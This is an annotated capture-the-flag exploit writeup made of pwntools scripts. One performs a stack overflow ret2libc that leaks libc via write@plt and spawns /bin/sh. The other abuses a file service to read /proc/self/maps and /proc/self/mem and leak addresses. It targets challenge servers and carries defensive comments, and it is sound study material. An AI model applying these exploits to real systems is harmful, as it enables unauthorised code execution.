文件读写内存实例

# level 3
# NOTE(review): indentation was lost when this listing was extracted, so the
# extent of the two `for` bodies below cannot be recovered from the text; the
# lines are kept exactly as found. attack(), change_host(), hacking(), attack2()
# and the `io` / `libc` objects used further down are defined earlier in the
# writeup, outside this excerpt.
for i in range(14):
attack()
change_host()
# Three short sessions that log in as 'B1rd' and are closed again straight
# away. Presumably this advances some server-side state before the final
# stage; the reason is not visible here — confirm against the helpers above.
for i in range(3):
if LOCAL:
io2 = process('./play')
else:
io2 = remote('47.104.90.157', 30003)
name = 'B1rd'
io2.recvuntil('login:')
io2.sendline(name)
io2.recvuntil('choice>> ')
io2.close()
hacking(1)
attack2()
# Stage 1 of the overflow. The name prompt accepts more input than its stack
# buffer holds: 0x4c bytes of filler reach the saved return address (the offset
# comes from the writeup; nothing visible here derives it). The forged frame
# returns into write@plt with the arguments (1, &got['read'], 4), so the program
# itself prints the resolved libc address of read(); 0x80492C0 is the address
# the injected write() call returns to afterwards (a fixed address in the
# binary — what it points at is not visible here). The fixed 0x0804xxxx
# addresses imply a non-PIE binary, so no code-address leak is needed.
# Defensive takeaway: a length-bounded read into the name buffer, a stack
# protector, or PIE+ASLR would each have blocked this stage.
io.recvuntil('what\'s your name:')
elf = ELF('./play')
io.sendline('A' * 0x4c + p32(elf.plt['write']) + p32(0x80492C0) + p32(1) +
p32(elf.got['read']) + p32(4))
# Skip the echoed newline, then take the 4 leaked bytes; read()'s runtime
# address minus its offset in the matching libc gives the libc load base.
io.recvuntil('\n')
libc_addr = u32(io.recvn(4)) - libc.symbols['read']
log.info('libc_addr:%#x' % libc_addr)
# system() and a "/bin/sh" string are located from the same libc base.
system_addr = libc_addr + libc.symbols['system']
bin_sh = libc_addr + next(libc.search('/bin/sh'))
log.info('system_addr:%#x' % system_addr)
log.info('bin_sh:%#x' % bin_sh)
# Stage 2: the same overflow again, now returning into system() with bin_sh as
# its argument; p32(0) fills the slot system() would return to.
attack2()
io.recvuntil('what\'s your name:')
io.sendline('A' * 0x4c + p32(system_addr) + p32(0) + p32(bin_sh))
io.recv()
io.interactive()
# -*- coding: UTF-8 -*-
from pwn import *
# Target selection and debug switches. LOCAL = 0 here, so the remote branch
# below is the one that runs; DEBUG is only consulted in the local branch.
LOCAL = 0
DEBUG = 1
VERBOSE = 1
if VERBOSE:
context.log_level = 'debug'
# NOTE(review): indentation was lost in extraction. Whether `if DEBUG:` sits
# inside the `if LOCAL:` branch cannot be told from the text (in that reading
# the later `else:` pairs with `if LOCAL:`). Lines are kept as found.
if LOCAL:
# Run the target locally with ASLR off and the challenge's libc preloaded, so
# that symbol offsets match the remote service.
io = process('./fileManager', aslr=False, env={'LD_PRELOAD':
'./libc.so.6'})
libc = ELF('./libc.so.6')
if DEBUG:
# Breakpoint at a fixed address taken from the writeup; it is only stable
# because aslr=False (the script later looks the binary's base up in
# /proc/self/maps, which suggests a position-independent executable).
gdb.attach(io, 'b *0x56555F2C\n')
else:
io = remote('47.104.188.138', 30007)
libc = ELF('./libc.so.6')
def read_mod(name, offset, size):
"""Drive the service's "read" menu entry and stop just before the data.

Sends menu choice 1, then the file name, offset and size the service prompts
for, and returns once the marker that precedes the file contents has been
seen; the caller reads the contents from `io` afterwards.

The recvuntil() markers are raw byte fragments of the program's non-ASCII
prompts (the encoding is not visible here — presumably a multibyte legacy
encoding; confirm against the binary). They are written for the str-based
Python 2 pwntools API; under Python 3 they would have to be bytes literals
to match the bytes on the wire.

Security note: `name` is forwarded to the service unchanged, and the script
later passes /proc/self/maps and /proc/self/mem through it — i.e. the service
does not confine the requested path to its intended directory. Canonicalising
the path and rejecting anything outside that directory (or opening relative to
a directory fd) would close that hole.
"""
io.recvuntil('\x87\xba\n')
io.sendline('1')
io.recvuntil('\xa7\xb0\x3a')
io.sendline(name)
io.recvuntil('\x87\x8f\x3a')
io.sendline(str(offset))
io.recvuntil('\xb0\x8f\x3a')
io.sendline(str(size))
io.recvuntil('\xae\xb9')
def write_mod(name, offset, size, content):
"""Drive the service's "write" menu entry.

Sends menu choice 2, then the file name, offset and size it prompts for, and
finally `content` itself. `content` goes out with send() rather than
sendline(), so no trailing newline is added — presumably because the service
reads exactly `size` bytes; confirm against the binary.

The recvuntil() markers are the same kind of raw prompt-byte fragments as in
read_mod() and carry the same Python 2 / bytes-literal caveat. Defined here
but not called within this excerpt; the script continues past it.
"""
io.recvuntil('\x87\xba\n')
io.sendline('2')
io.recvuntil('\xa7\xb0\x3a')
io.sendline(name)
io.recvuntil('\x87\x8f\x3a')
io.sendline(str(offset))
io.recvuntil('\xb0\x8f\x3a')
io.sendline(str(size))
io.recvuntil('\x9d\x97\x3a')
io.send(content)
# Log in, then use the unrestricted file read to locate the process in memory.
# The script continues past this excerpt.
name = 'B1rd'
io.recvuntil('FTP:')
io.sendline(name)
# /proc/self/maps: the first 8 hex digits of the output are taken as the
# executable's load base. This assumes the first mapping listed is the binary
# itself (the usual layout for a PIE executable; confirm on the target).
# That the service will serve a path under /proc at all is the root cause —
# see the note on read_mod().
read_mod('/proc/self/maps', 0, 0x100)
elf_base = int(io.recvn(8), 16)
log.info('elf_base:%#x' % elf_base)
elf = ELF('fileManager')
# /proc/self/mem at the GOT slot of open(): the stored pointer, minus open's
# offset in the matching libc, gives the libc base. The slot is already
# resolved because the service had to call open() to serve the maps read
# (presumably lazy binding; confirm). 0x100 bytes are requested but only the
# first 4 are consumed here; the remainder stays in the receive buffer.
read_mod('/proc/self/mem', elf_base + elf.got['open'], 0x100)
libc_addr = u32(io.recvn(4)) - libc.symbols['open']
system_addr = libc_addr + libc.symbols['system']
log.info('libc_addr:%#x' % libc_addr)
log.info('system_addr:%#x' % system_addr)